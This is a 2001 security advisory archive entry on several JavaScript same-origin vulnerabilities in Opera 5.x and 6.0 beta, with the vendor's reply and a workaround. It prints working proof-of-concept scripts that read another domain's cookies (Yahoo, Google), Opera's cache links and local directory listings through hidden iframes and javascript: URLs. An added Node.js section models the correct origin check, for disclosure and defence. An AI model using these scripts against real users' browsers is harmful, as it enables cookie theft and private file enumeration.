16th Nov 2001
COMMAND
Opera web browser multiple JavaScript same-origin vulnerabilities
SYSTEMS AFFECTED
Opera 5.12/Windows, Opera 5.0/Linux - probably other versions
PROBLEM
From Georgi Guninski's security advisory #51 [www.guninski.com]:
Several javascript vulnerabilities in Opera
Systems affected: Opera 5.12/Windows, Opera 5.0/Linux - probably other versions
Risk: Medium
Date: 15 November 2001
Legal Notice: This Advisory is Copyright (c) 2001 Georgi Guninski. You may
distribute it unmodified. You may not modify it and distribute it or distribute
parts of it without the author's written permission.
Disclaimer: The information in this advisory is believed to be true based on
experiments though it may be false. The opinions expressed in this advisory and
program are my own and not of any company. The usual standard disclaimer
applies, especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality provided
by this advisory or program. Georgi Guninski bears no responsibility for
content or misuse of this advisory or program or any derivatives thereof.
Announcement: I am looking for contracts in the security area - check
http://www.guninski.com
Description: Opera is a multiplatform web browser. There are several javascript
vulnerabilities in it, basically allowing script in a page to access a page and
its properties in another domain - AFAIK Netscape calls this a "Same Origin
Vulnerability". It is possible for a script in a web page to access at least
cookies and links in arbitrary domains to which the user has access. It is also
possible for a script to read the links in the user's cache and history, which
at least has privacy implications if not more. In some cases cookies and links
in the cache/history may contain sensitive information such as
usernames/passwords etc.
Details:
Examine the following scripts:
-1.----------------------------------
// Open a window on a foreign domain and, once it has loaded, read its
// cookies from the opener. The same-origin policy should refuse this read.
a=window.open("http://mail.yahoo.com");
function f()
{
xx=a.document.cookie;
alert("hi"+xx);
// Overwrite the foreign window with our own content: the injected script
// opens the domain again and reads its cookies after it has loaded.
a.document.open();
a.document.write("<h1>aa</h1><script>x=window.open('http://mail.yahoo.com');setTimeout('z=x.document.cookie;alert(z);',5000)</"+"script>");
a.document.close();
}
// Give the foreign page five seconds to load before touching it.
setTimeout("f()",5000);
-----------------------------------
-2.--------------------------------
// Open Opera's internal cache listing and read one of its links from the
// opener; the history listing can be read the same way.
a=window.open("about:cache");
function f()
{
xx=a.document.links[2];
alert("hi="+xx);
}
setTimeout("f()",5000);
-----------------------------------
In addition, the HotJava exploit at http://www.guninski.com/hotjava1-desc.html
also works, as Jay@InfoAve.net pointed out.
Andreas Sandblad [http://www.homer.nu/security/opera/] added:
One thing that wasn't mentioned and might not be obvious is that the
vulnerability can also be used to list files on the user's hard drive. This is
because the URL file://c:/ is seen as an HTML page by Opera. Thus we can use
document.links to retrieve filenames and directories.
Opera released 6.0 beta 1 for Windows three days ago and it's also vulnerable.
In fact it's actually much easier to write the script for it and easier to make
the attack invisible since Opera added better support for iframe.
Opera 6.0 (not 5.x): List files and directories in c:/
<iframe id="rewrite" src="file://c:/" width=0 height=0></iframe>
<script language="javascript">
// javascript: URL which, when run inside the frame, concatenates every link
// of the directory listing (each file and directory name) and displays it.
s="javascript:t='';for(i=0;(c=document.links.item(i));i++){t+=c};alert(t);";
// Navigating the hidden frame to the javascript: URL runs it in the
// frame's own (file:) context rather than the attacker page's.
setTimeout('parent.rewrite.document.location="'+s+'"',1);
</script>
Opera 6.0 (not 5.x): Get google cookie
<iframe id="rewrite" src="http://www.google.com/" width=0 height=0></iframe>
<script language="javascript">
// After the foreign page has loaded, navigate the frame to a javascript: URL;
// it executes in the google.com document and so can read its cookies.
setTimeout('parent.rewrite.document.location="javascript:alert(document.cookie)"',8000);
</script>
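Every script above depends on the same missing check: the opener reads document.cookie or document.links of a window in another domain (scripts 1 and 2, the file://c:/ listing), or a page navigates a foreign frame to a javascript: URL that then runs in the frame's origin (the Opera 6.0 cases). The following is an added example, not code from the advisory or from Opera, modelling in Node.js the same-origin decision a browser has to make: an origin is the (scheme, host, port) tuple, schemes without a network origin (file:, about:, javascript:) never compare equal to anything, and a javascript: navigation of another frame is allowed only when the navigating page already shares that frame's origin. The host attacker.example is a hypothetical attacker site; the other URLs are the ones used in the advisory.

```javascript
// Added example, not from the advisory or from Opera: a minimal model of the
// same-origin check that Opera 5.12/6.0b1 did not apply in the cases above.

// Schemes that carry a network origin, with their default ports.
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443' };

// Return the (scheme, host, port) origin of a URL, or null for schemes such
// as file:, about: and javascript: that have no network origin and so must
// never compare equal to anything, not even to themselves.
function originOf(urlString) {
  const u = new URL(urlString);
  if (!Object.prototype.hasOwnProperty.call(DEFAULT_PORTS, u.protocol)) return null;
  return {
    scheme: u.protocol,
    host: u.hostname,                      // already lower-cased by the parser
    port: u.port || DEFAULT_PORTS[u.protocol],
  };
}

// Strict tuple comparison: scheme, host and port must all match.
function sameOrigin(urlA, urlB) {
  const a = originOf(urlA), b = originOf(urlB);
  if (a === null || b === null) return false;
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// May script running in `accessor` read DOM state (document.cookie,
// document.links, ...) of a window or frame currently showing `target`?
// Scripts 1 and 2 and the file://c:/ listing need this to be true across
// origins; a correct browser answers false.
function mayReadDocument(accessor, target) {
  return sameOrigin(accessor, target);
}

// May script in `navigator` set another frame's location to `newUrl` while
// that frame shows `frameCurrent`? Ordinary cross-origin navigation is fine,
// since the navigator cannot read the result, but a javascript: URL executes
// inside the frame's current origin, so it is acceptable only when the
// navigator already owns that origin. This is the Opera 6.0 iframe case.
function mayNavigateFrame(navigator, frameCurrent, newUrl) {
  const target = new URL(newUrl, frameCurrent);
  if (target.protocol === 'javascript:') {
    return sameOrigin(navigator, frameCurrent);
  }
  return true;
}

// The advisory's attempts, issued from a hypothetical attacker page, as the
// check decides them. Every value is false: all four accesses are refused.
function advisoryAttempts() {
  const attacker = 'http://attacker.example/';
  return {
    readYahooCookie: mayReadDocument(attacker, 'http://mail.yahoo.com/'),
    readCacheLinks: mayReadDocument(attacker, 'about:cache'),
    readDriveListing: mayReadDocument(attacker, 'file:///c:/'),
    javascriptIntoGoogleFrame: mayNavigateFrame(
      attacker, 'http://www.google.com/', 'javascript:alert(document.cookie)'),
  };
}

console.log(advisoryAttempts());
```

The point of the null origin for file:, about: and javascript: is exactly Sandblad's observation: a local directory listing rendered as HTML is still a document with links, so the check must not fall back to "no host, therefore no restriction". Note also that the navigation rule does not block cross-origin navigation as such, only the case where the new URL would run script in the frame's origin.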
SOLUTION
Workaround: Disable javascript (Opera suggests enabling "Use cookies to trace
password protected documents")
Vendor status: The vendor was notified on 5 November 2001 and was asked whether
a fix shall be issued and when. The reply was:
------------------------------------
You should be able to resolve the cookie issue by enabling "Use cookies to
trace password protected documents", which means that pages with password
protection aren't cached, cookies aren't stored, the URL shouldn't be displayed
in History, etc. This is a "paranoia" option, and makes a few pages unusable.
As you are probably aware, many web technologies aren't very secure, but it is
inconvenient for the user to block these. This is why the user should be given
a choice to block privacy related information.
------------------------------------